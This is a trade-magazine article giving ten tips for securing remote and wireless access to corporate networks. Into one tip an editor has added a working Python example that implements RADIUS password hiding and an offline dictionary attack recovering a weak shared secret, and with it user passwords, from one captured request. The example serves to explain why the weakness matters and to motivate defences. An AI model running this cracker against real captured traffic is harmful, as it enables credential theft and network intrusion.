August 2004 issue > Feature: Tireless Wireless
A common-sense approach to secure remote connectivity
Jon Russo
Wednesday, July 9, 2008
Seemingly overnight, remote connectivity to corporate resources became a business imperative. And with each new access method, a related technology also emerged for securing this endless array of wired, wireless and broadband connections.

So how do IT departments keep mobile employees productive while still protecting valuable corporate resources? The following tips, drawn from what we at iPass have learned over the years working with corporations that have large mobile workforces, offer a best-practice approach to secure remote connectivity in today’s increasingly complex environment.

As IT departments refine security policies for their companies, it makes sense for them to review best practice recommendations from every vendor that provides critical components to their IT system, such as operating systems, anti-virus protection, firewalls, personal firewall software and virtual private networking solutions.

1. Base Security Policies on Individual Risk Assessment
Risk assessment is a critical component of any defense-in-depth strategy. As IT departments consider corporate threats, vulnerabilities and operational risks, they should keep in mind that remote access makes it essential to weigh each user’s business needs against the specific risks that user introduces, and to understand the similarities and differences between classes of users: an executive carrying customer data on a notebook and a contractor with read-only access to one application do not warrant the same controls.

2. Conduct Annual Security Policy Audits
Companies are in a constant state of change. Shifting business processes, personnel, vendors and corporate priorities require regular security policy review. An annual security policy audit can align a company’s current needs with the proper security measures.

3. Require Authentication and User Credential Protection
Some remote access providers offer the ability to forward authentication to the corporate-owned infrastructure. Other providers choose to deploy a separate authentication database.

Regardless of which approach IT departments choose, the following tips will help strengthen security:
  • Ensure that every connection crossing the firewall is authenticated with digital certificates, and that the client actually validates the certificate it is presented rather than accepting whatever it is offered.

  • Protect user credentials from the connectivity client all the way to the enterprise network.

  • Beware of provider implementations based solely on RADIUS proxy authentication networks. RADIUS does not encrypt the user’s password; it only obscures the User-Password attribute with an MD5-derived keystream keyed by the shared secret, so a captured request plus a weak or guessable secret yields the password to an offline dictionary attack, and every proxy in the chain must unwrap the password to forward it, so each hop sees it in the clear. Some such networks simply send credentials in clear text.

  • Make sure some form of credential protection is available over the initial link between the notebook or PDA and the network access point. This has become increasingly important with the advent of Wi-Fi hotspots and Wi-Fi home networks.

  • For additional security, deploy stronger authentication such as hardware tokens or digital certificates to validate a user’s identity and establish a unique network session; a one-time token code is worthless to an attacker who has captured a static password.
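To make the RADIUS point above concrete, here is an added example (written for this edit, not code from the article or from iPass) that implements the RFC 2865 User-Password hiding a network access server applies before sending an Access-Request, the unwrapping a RADIUS server or proxy performs, and the offline dictionary attack an eavesdropper on the NAS-to-proxy link can run against a guessable shared secret. The shared secret, user password, wordlist and fixed Request Authenticator are constructed for the demonstration; a real NAS chooses the authenticator at random for every request.

```python
import hashlib
import os

# Constructed example values (not from the article): a weak shared secret, a
# user password and a fixed 16-byte Request Authenticator so the run repeats.
WEAK_SECRET = b"testing123"
USER_PASSWORD = b"Corr3ct-h0rse"
REQUEST_AUTHENTICATOR = bytes(range(0x10, 0x20))


def hide_user_password(password: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 section 5.2: pad the password to 16-byte blocks, then XOR each
    block with MD5(secret || previous block), chaining from the Request
    Authenticator. This is obfuscation keyed only by the shared secret."""
    if len(authenticator) != 16:
        raise ValueError("Request Authenticator must be 16 bytes")
    padded = password + b"\x00" * (-len(password) % 16)
    hidden, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        hidden += block
        prev = block  # the next keystream block depends on this ciphertext block
    return hidden


def reveal_user_password(hidden: bytes, secret: bytes, authenticator: bytes) -> bytes:
    """Inverse of hide_user_password, exactly as a RADIUS server or proxy does
    it. Returns the padded plaintext, trailing NUL padding included."""
    plain, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = hidden[i:i + 16]
        plain += bytes(c ^ k for c, k in zip(block, keystream))
        prev = block
    return plain


def looks_like_password(plain: bytes) -> bool:
    """Plausibility test for a candidate decryption: printable ASCII followed
    by nothing but NUL padding. A wrong secret produces random-looking bytes."""
    head, _, tail = plain.partition(b"\x00")
    return bool(head) and all(0x20 <= b < 0x7F for b in head) and not tail.strip(b"\x00")


def crack_shared_secret(hidden: bytes, authenticator: bytes, wordlist):
    """Offline dictionary attack by someone who captured a single Access-Request
    (Request Authenticator plus hidden User-Password) in transit. The attack
    guesses the shared secret, not the user's password; the secret is normally
    the same for every user of that NAS, so one capture exposes them all."""
    for candidate in wordlist:
        plain = reveal_user_password(hidden, candidate.encode(), authenticator)
        if looks_like_password(plain):
            return candidate, plain.rstrip(b"\x00").decode()
    return None


def proxy_forward(hidden, inbound_secret, outbound_secret, in_auth, out_auth):
    """What a RADIUS proxy must do to forward the request to the next hop:
    recover the plaintext and re-hide it under its own secret and a fresh
    authenticator. Every proxy in the chain therefore sees the password."""
    plain = reveal_user_password(hidden, inbound_secret, in_auth).rstrip(b"\x00")
    return plain, hide_user_password(plain, outbound_secret, out_auth)


if __name__ == "__main__":
    authenticator = os.urandom(16)  # what a real NAS would do
    on_the_wire = hide_user_password(USER_PASSWORD, WEAK_SECRET, authenticator)
    wordlist = ["password", "radius", "secret", "testing123", "s3cr3t"]
    print("hidden User-Password:", on_the_wire.hex())
    print("dictionary attack   :", crack_shared_secret(on_the_wire, authenticator, wordlist))
    seen_by_proxy, _ = proxy_forward(on_the_wire, WEAK_SECRET, b"next-hop", authenticator, os.urandom(16))
    print("seen at proxy       :", seen_by_proxy.decode())
```

The defense the article recommends, protecting the credential from the connectivity client all the way to the enterprise, means keeping the password out of the User-Password attribute altogether, for example by carrying it inside a TLS-protected EAP method or by running IPsec between RADIUS hops, rather than relying on the strength of each proxy’s shared secret.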


4. Actively Manage Passwords
Develop password policies that require passwords complex enough to withstand dictionary attacks, yet memorable enough that users neither write them down nor forget them. Require a mix of letters, numbers and other characters rather than a dictionary word with a digit appended. Enforce password changes at regular intervals, and immediately after any suspected compromise. Disable password auto-save features in connectivity and VPN clients: a notebook that remembers its own credentials turns a stolen or compromised machine into an open door to the corporate network.

5. Ratchet Down Firewalls
Limiting the sources from which Internet traffic is accepted is a good way to limit exposure of the corporate network. One easy way to mitigate risk is to accept remote-access traffic at the firewall only from the address range of the service provider’s access gateways rather than from the whole Internet. Treat this as a filter, not as authentication: a source address is easily spoofed and proves nothing about the user behind it. Additionally, make sure all remote devices are protected with a properly configured personal firewall.

6. Use Secure VPN Tunnels
High-speed broadband connections help mobile employees work faster and smarter at home, in hotel rooms and in public venues. However, these always-on links also present attractive targets as back-door entry points to the corporate LAN. That’s why use of virtual private networking for remote and mobile workers has become a business imperative.

7. Manage Security Policies Centrally
Security management, by its very nature, is a multi-layer process that involves best-in-class tools from multiple vendors and numerous administration consoles. The distributed nature of remote access further complicates this. Choose a remote access service that offers central policy management in order to simplify policy administration and enforcement of both basic remote network access and third-party security products.

8. Don’t Compromise on Wireless Security
Wireless access presents additional challenges to corporate security. The following suggestions can strengthen security on the corporate campus or at the homes of employees who may use wireless LANs, Wi-Fi hotspots and broadband connections to access the corporate network.
  • Change the default admin password of your wireless router/access points

  • Use Media Access Control (MAC) address filtering and Wired Equivalent Privacy (WEP) where nothing stronger is available, but treat both as deterrents only: MAC addresses are trivially cloned and WEP’s RC4 keying is cryptographically broken, so prefer WPA or WPA2 where the hardware supports it and never rely on the wireless link itself to protect credentials or corporate data

  • Keep wireless router/access point firmware up to date

  • Turn down the transmit power so that the wireless network does not broadcast its signal farther than necessary

  • Use VPN-based access for corporate wireless LANs

  • Pay special attention to hotspot access: treat every hotspot as a hostile network, and send credentials and corporate traffic only inside the VPN tunnel

  • Require VPNs for home wireless access


9. Educate End-Users about Network Security
The average end-user generally has neither a complete understanding of the need for network security nor an awareness of potential network vulnerabilities. A typical example is a Wi-Fi user who leaves file sharing enabled on a notebook, letting everyone else on the hotspot browse the hard drive. Once end-users realize how a security breach can affect their company, and their livelihood, it is amazing how security conscious they become.

10. Use Monitoring and Management Tools to Refine Security Policies
Any remote access solution must include tools that allow customers to monitor and manage connections. This capability not only provides valuable connection data to IT staff, it also helps the IT department spot potential abuse patterns (such as bursts of authentication failures against one account, or one account connecting from two countries within minutes), identify end users who could benefit from training, and create special monitoring practices for high-risk users and users with high-value corporate data on their notebooks.

Jon Russo is vice president of marketing at iPass [NASD:IPAS], a remote connectivity solutions company. He joined iPass in December 2001 after serving as vice president of marketing for Frontier Communications, where he drove the strategies for data, Web, managed security and Internet Protocol (IP) services, which was acquired by Global Crossing. Russo came to Frontier after his content distribution startup, GlobalCenter, had been acquired. Before his commercial experiences, Jon was a telecommunications officer in the United States Army. He holds an MBA from the University of California, Berkeley, and a bachelor’s degree in finance from the University of Connecticut.
